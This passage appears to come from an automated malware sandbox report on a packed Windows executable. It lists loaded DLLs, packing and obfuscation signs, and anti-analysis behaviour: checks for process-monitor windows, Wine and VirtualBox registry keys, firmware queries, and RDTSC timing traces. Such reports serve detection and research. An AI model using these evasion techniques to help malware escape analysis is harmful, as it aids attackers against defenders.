Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: jSFUzuYPG9.exe

Static file information: File size 2870272 > 1048576

Source: jSFUzuYPG9.exe

Static PE information: Raw size of trstwfmm is bigger than: 0x100000 < 0x294c00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Unpacked PE file: 0.2.jSFUzuYPG9.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: jSFUzuYPG9.exe

Static PE information: real checksum: 0x2c69ff should be: 0x2c313f

PE file contains sections with non-standard names

Source: jSFUzuYPG9.exe	Static PE information: section name:
Source: jSFUzuYPG9.exe	Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe	Static PE information: section name: .idata
Source: jSFUzuYPG9.exe	Static PE information: section name: trstwfmm
Source: jSFUzuYPG9.exe	Static PE information: section name: ekycdelp
Source: jSFUzuYPG9.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E78 push esp; ret	0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B2E48 push edx; ret	0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B4E4C push ecx; iretd	0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE40 pushad ; iretd	0_3_016ACE41
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD158 pushad ; iretd	0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016B1150 pushad ; iretd	0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE55 pushad ; iretd	0_3_016ACE59
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016ACE10 pushad ; iretd	0_3_016ACE11
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD0E0 pushad ; iretd	0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AD2D8 pushad ; iretd	0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA8F push 00000001h; iretd	0_3_016AFAA0
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA81 push 00000001h; iretd	0_3_016AFAA0
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Code function: 0_3_016AFA81 push 00000001h; iretd	0_3_016AFAA0

Source: jSFUzuYPG9.exe

Static PE information: section name: entropy: 7.9813529381203026

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1EC32 second address: E1EC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1EC45 second address: E1EC7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F4BA0D3F156h 0x00000015 jl 00007F4BA0D3F156h 0x0000001b jnl 00007F4BA0D3F156h 0x00000021 popad 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0A7EC second address: E0A7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0A7F7 second address: E0A7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD01 second address: E1DD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD07 second address: E1DD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E1DD0B second address: E1DD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21984 second address: E2198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4BA0D3F156h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21A96 second address: E21AA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21AA0 second address: E21AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 6CC0A04Eh 0x0000000d xor dx, E4B5h 0x00000012 lea ebx, dword ptr [ebp+1244D8BCh] 0x00000018 mov dword ptr [ebp+122D1F3Dh], ebx 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F4BA0D3F166h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21BFC second address: E21C0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C0D second address: E21C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C11 second address: E21C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21C17 second address: E21C35 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F4BA0D3F156h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21D76 second address: E21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jnc 00007F4BA0D3970Ch 0x0000000c mov dword ptr [ebp+122D1D21h], ebx 0x00000012 push 00000003h 0x00000014 mov cx, C149h 0x00000018 mov dword ptr [ebp+122D280Dh], esi 0x0000001e push 00000000h 0x00000020 js 00007F4BA0D39709h 0x00000026 sub dl, FFFFFFFAh 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D27FCh], eax 0x00000031 push 8051659Fh 0x00000036 jmp 00007F4BA0D3970Bh 0x0000003b add dword ptr [esp], 3FAE9A61h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F4BA0D39708h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c mov dl, 24h 0x0000005e ja 00007F4BA0D3970Ah 0x00000064 call 00007F4BA0D39714h 0x00000069 and edx, dword ptr [ebp+122D2C57h] 0x0000006f pop edi 0x00000070 lea ebx, dword ptr [ebp+1244D8D0h] 0x00000076 jns 00007F4BA0D3970Ch 0x0000007c xchg eax, ebx 0x0000007d push edx 0x0000007e jmp 00007F4BA0D39717h 0x00000083 pop edx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jne 00007F4BA0D39716h 0x0000008d jmp 00007F4BA0D39710h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E21E4B second address: E21E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17F96 second address: E17FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39717h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FB4 second address: E17FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D3F156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FC0 second address: E17FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4BA0D3970Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E17FD7 second address: E17FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FBAA second address: E3FBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FFEF second address: E3FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3FFF3 second address: E3FFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406BB second address: E406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406C1 second address: E406E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4BA0D39706h 0x0000000a jnl 00007F4BA0D39706h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D3970Fh 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E406E5 second address: E4070D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jno 00007F4BA0D3F167h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E3576D second address: E35771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E35771 second address: E35775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E40A04 second address: E40A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39714h 0x00000007 pushad 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E40A3E second address: E40A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E410F9 second address: E410FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E413E5 second address: E413EF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
